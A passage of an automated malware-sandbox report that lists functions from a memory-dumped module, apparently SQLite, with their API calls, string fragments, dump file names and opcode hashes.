                                                                                                                                                                                      • Instruction ID: 67d68dba2000bb8482a24fc023f268fc16b477c73c548bd02e1b99648bc578f6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                                                                                                                      • Instruction Fuzzy Hash: C9B09B2071430D565708CE549440977779DB784905724C455D81C85505E735E59152D0
                                                                                                                                                                                      Function 61E037F3 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c758f56ce800b0edb1a3b6b4920dd8d203c929418ffadd695cc457fe8d80d330
                                                                                                                                                                                      • Instruction ID: de6271d013a038b850d850acc4260bf908e6486e870890920c4c51f453ae2ee2
                                                                                                                                                                                      • Opcode Fuzzy Hash: c758f56ce800b0edb1a3b6b4920dd8d203c929418ffadd695cc457fe8d80d330
                                                                                                                                                                                      • Instruction Fuzzy Hash: C7B0123B11030CCB4700DD0DD441CC1B3D8F708E127C104D0E41087701D669F800C685
                                                                                                                                                                                      Function 61E100D7 Relevance: 27.3, APIs: 11, Strings: 7, Instructions: 280COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID: ance$ate$ence$iti$ive$ize$ous
                                                                                                                                                                                      • API String ID: 1475443563-1713922985
                                                                                                                                                                                      • Opcode ID: 5306eb8679e29c7ccae58c152c61b3cb2e43ab0ad82d1b8259ffa351aff7fd54
                                                                                                                                                                                      • Instruction ID: a6745917a23cee73da34d97950539bfd860ce037a133a9b2c34405b562b65f13
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5306eb8679e29c7ccae58c152c61b3cb2e43ab0ad82d1b8259ffa351aff7fd54
                                                                                                                                                                                      • Instruction Fuzzy Hash: 90C127B0E083068BDB00DF94C58669EBBF4AF85348F31C81ED890DB754D779D5A68B92
                                                                                                                                                                                      Function 61E0FBCF Relevance: 25.8, APIs: 10, Strings: 7, Instructions: 268COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID: ance$ate$ence$iti$ive$ize$ous
                                                                                                                                                                                      • API String ID: 1475443563-1713922985
                                                                                                                                                                                      • Opcode ID: e540365b7fd7f9443dd82ee147f8b9093e47f334e53584792075e5945152a348
                                                                                                                                                                                      • Instruction ID: 60f9232e79ba8c46656df14b30f4429a15bc78d1e5e1648a3d40d26d176db9d4
                                                                                                                                                                                      • Opcode Fuzzy Hash: e540365b7fd7f9443dd82ee147f8b9093e47f334e53584792075e5945152a348
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6EB128B0D0D3068BDB00CF94C58669EBBF4AF85348F31C81AD890DB754D779D9A68B92
                                                                                                                                                                                      Function 61E970B9 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 447COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • memcmp.MSVCRT ref: 61E97281
                                                                                                                                                                                        • Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: freememcmp
                                                                                                                                                                                      • String ID: = ?$ AND $ IS ?$ SET $ WHERE $UPDATE main.$bua$bua$idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END $sqlite_stat1
                                                                                                                                                                                      • API String ID: 1183899719-1341641573
                                                                                                                                                                                      • Opcode ID: 64ffc3348e5e410702e848c8edd78b134323dad80dcbaa00aa6c1ed7fa469ecb
                                                                                                                                                                                      • Instruction ID: 0d5b731b4e6e71452f02b40a28acc7cf76705435dae47c5a45c9821af7cd2139
                                                                                                                                                                                      • Opcode Fuzzy Hash: 64ffc3348e5e410702e848c8edd78b134323dad80dcbaa00aa6c1ed7fa469ecb
                                                                                                                                                                                      • Instruction Fuzzy Hash: AE12E774E04259DBDB04CF98D480A9DBBF2BF88308F25C869E855AB351D774E886CF81
                                                                                                                                                                                      Function 61E3C943 Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 360stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strncmp
                                                                                                                                                                                      • String ID: -$-$0$]$false$null$true$}
                                                                                                                                                                                      • API String ID: 1114863663-1443276563
                                                                                                                                                                                      • Opcode ID: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
                                                                                                                                                                                      • Instruction ID: 7d0d7d581299a88f4ecf4101ed3cb2921062378b47abb911dec42016596cbabc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BD1DF70B482768ADB12CFA8C4443DABBF2AFCA318F69C25BD4919B281D739D446C751
                                                                                                                                                                                      Function 61E44905 Relevance: 13.8, APIs: 6, Strings: 3, Instructions: 346COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID: @$access$cache
                                                                                                                                                                                      • API String ID: 1475443563-1361544076
                                                                                                                                                                                      • Opcode ID: d5536d11e1446137f876ee1720edd4e4232c55533b5c63909df9ac41a168e106
                                                                                                                                                                                      • Instruction ID: bf7f6bc55254c54d21197c9aa673ce015ae0bdc4e4658c964804263f7089fac0
                                                                                                                                                                                      • Opcode Fuzzy Hash: d5536d11e1446137f876ee1720edd4e4232c55533b5c63909df9ac41a168e106
                                                                                                                                                                                      • Instruction Fuzzy Hash: FDD16FB4A083558FEB11CFA4D48039EBBF1AF89318F28C45ED895AB341E339D841DB55
                                                                                                                                                                                      Function 61E241D7 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 180stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strcmp
                                                                                                                                                                                      • String ID: ya$ya$(blob)$NULL$Xya$bua$bua$program
                                                                                                                                                                                      • API String ID: 1004003707-2454903709
                                                                                                                                                                                      • Opcode ID: a6b2441489b3eea19d207b247f0247f0001f19373451080d8235a064463bd687
                                                                                                                                                                                      • Instruction ID: 4befd86826370bfd8630e1afa8d422750160e2b9b2ea18a9ced5634f5bcee847
                                                                                                                                                                                      • Opcode Fuzzy Hash: a6b2441489b3eea19d207b247f0247f0001f19373451080d8235a064463bd687
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B7115B49097469FC708CF58C191A59BBF0BF8A304F25C85EE8A89B751D335D882CF92
                                                                                                                                                                                      Function 61E01040 Relevance: 10.6, APIs: 7, Instructions: 132sleepCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Sleep_amsg_exit
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1015461914-0
                                                                                                                                                                                      • Opcode ID: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
                                                                                                                                                                                      • Instruction ID: a154691f748ef5392a7e4955094c5928503ae470ce452f5208c2c148eeae8840
                                                                                                                                                                                      • Opcode Fuzzy Hash: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13414F71B146818FEB00AFE8C98470BB7F1EB85399F64C53DE4A48B344D775D9918B82
                                                                                                                                                                                      Function 61EAF850 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32 ref: 61EAF889
                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF89A
                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 61EAF8A2
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 61EAF8AA
                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61EAF8B9
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                      • Opcode ID: 11ba3c5eec943ccd272f0a4fc468b32cfef13cd0c029082f67a55811cb38d485
                                                                                                                                                                                      • Instruction ID: 8be46cd1f480235cb6d0906dde7f3b0c5fd652d59fe7cf958993e94cb5683476
                                                                                                                                                                                      • Opcode Fuzzy Hash: 11ba3c5eec943ccd272f0a4fc468b32cfef13cd0c029082f67a55811cb38d485
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D1170B29553118FCB00DFB9E58855BBBE0FB89654F050939E544CB200EB35D9898B92
                                                                                                                                                                                      Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                      • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                                                                                                      • API String ID: 1646373207-328863460
                                                                                                                                                                                      • Opcode ID: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
                                                                                                                                                                                      • Instruction ID: ecefe885db533eab1004145bf0edfd2de441c317d2227bbbfd891c436449bb9f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
                                                                                                                                                                                      • Instruction Fuzzy Hash: CBE06DB4914B029BEB017FF4850633EBAF5AFC570AF72C42CD4808A290EA30C4818763
                                                                                                                                                                                      Function 61E3720A Relevance: 6.4, APIs: 3, Strings: 1, Instructions: 359COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 1475443563-4108050209
                                                                                                                                                                                      • Opcode ID: 83c6ba0f8f63bb70d6e249cfeaf4de278211f53a98edee321264bd888aa8c0dc
                                                                                                                                                                                      • Instruction ID: 3f20ce3ba2961136da7f3248cde08971803f4c449cb9daae0617fd169a942f67
                                                                                                                                                                                      • Opcode Fuzzy Hash: 83c6ba0f8f63bb70d6e249cfeaf4de278211f53a98edee321264bd888aa8c0dc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CE112B0E04269CBDB41CFA8C99078DBBF1BF89318F258569D859AB345D734E886CF41
                                                                                                                                                                                      Function 61E40BB5 Relevance: 6.4, APIs: 5, Instructions: 106COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1475443563-0
                                                                                                                                                                                      • Opcode ID: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
                                                                                                                                                                                      • Instruction ID: fd79a925e1d847c1357e69ee8e74f21d123acc92255d85b94bee504056160bb0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
                                                                                                                                                                                      • Instruction Fuzzy Hash: C0414EB0A083058BE7049FA9D68439EBAF5EFD5358F25C83DE898CB384D775D4458B42
                                                                                                                                                                                      Function 61EAAF5A Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 332stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • strcmp.MSVCRT ref: 61EAB012
                                                                                                                                                                                        • Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
